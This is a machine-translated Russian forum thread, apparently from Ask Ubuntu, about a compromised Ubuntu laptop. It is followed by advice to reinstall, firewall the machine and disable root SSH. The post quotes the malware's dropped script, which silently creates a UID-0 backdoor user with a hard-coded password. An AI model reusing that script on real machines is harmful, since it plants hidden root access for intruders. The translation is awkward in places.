Я вполне уверен, что мой ноутбук Ubuntu 13.10 заражен каким-то вредоносным ПО.
Время от времени я обнаруживаю, что процесс / lib / sshd (принадлежит root) работает и потребляет много процессоров. Это не сервер sshd, который запускает / usr / sbin / sshd.
У двоичного файла есть разрешения --wxrw-rwt, и он генерирует и запускает сценарии в каталоге / lib. Последний называется 13959730401387633604 и выполняет следующие действия:
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Пользователь gusr был создан вредоносной программой независимо друг от друга, а затем chpasswd зависает при потреблении 100% ЦП.
До сих пор я обнаружил, что пользователь gusr был дополнительно добавлен в файлы в / etc /
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Похоже, что вредоносная программа сделала копии всех этих файлов с помощью "- суффикс Полный список файлов / etc /, которые были изменены пользователем root, доступен здесь .
Кроме того, файл / etc / hosts был изменен на this .
/ lib / sshd начинается с добавления себя в конец файла /etc/init.d/rc.local!
Я удалил пользователя, удалил файлы, убил дерево обработанных , изменил мои пароли и удалил открытые ключи ssh.
Я знаю, что я в основном испорчен, и я, скорее всего, переустановлю всю систему. Тем не менее, поскольку я подключаюсь к нескольким другим машинам, было бы хорошо, по крайней мере, попытаться удалить его и выяснить, как я его получил. Будем благодарны за любые предложения о том, как это сделать.
Похоже, что они вошли 25 марта с помощью грубого входа в систему. Я понятия не имел, что root ssh по умолчанию включен в Ubuntu. Я отключил это и поднял denyhosts.
Логин был от 59.188.247.236, где-то в Гонконге, очевидно.
Я получил ноутбук от EmperorLinux, и они включили root-доступ. Если у вас есть один из них и вы используете sshd, будьте осторожны.
Во-первых, получите ту машину от сети теперь!
114-секундный, почему Вам включали корневую учетную запись? Вы действительно не должны включать корневую учетную запись, если у Вас нет очень серьезного основания сделать так.
, В-третьих, да, единственный способ быть уверенным, Вы являетесь чистыми, состоит в том, чтобы сделать чистую установку. Также рекомендуется, чтобы Вы запустили новый и не возвращались к резервному копированию, поскольку Вы никогда не можете быть уверены, когда все это запустилось.
я также предполагаю, что Вы настраиваете брандмауэр в своей следующей установке и отклоняете все входящие соединения:
sudo ufw default deny incoming
и затем позволяют ssh с:
sudo ufw allow ssh
и не включают корневую учетную запись! , Конечно удостоверяются, что корень ssh вход в систему отключен.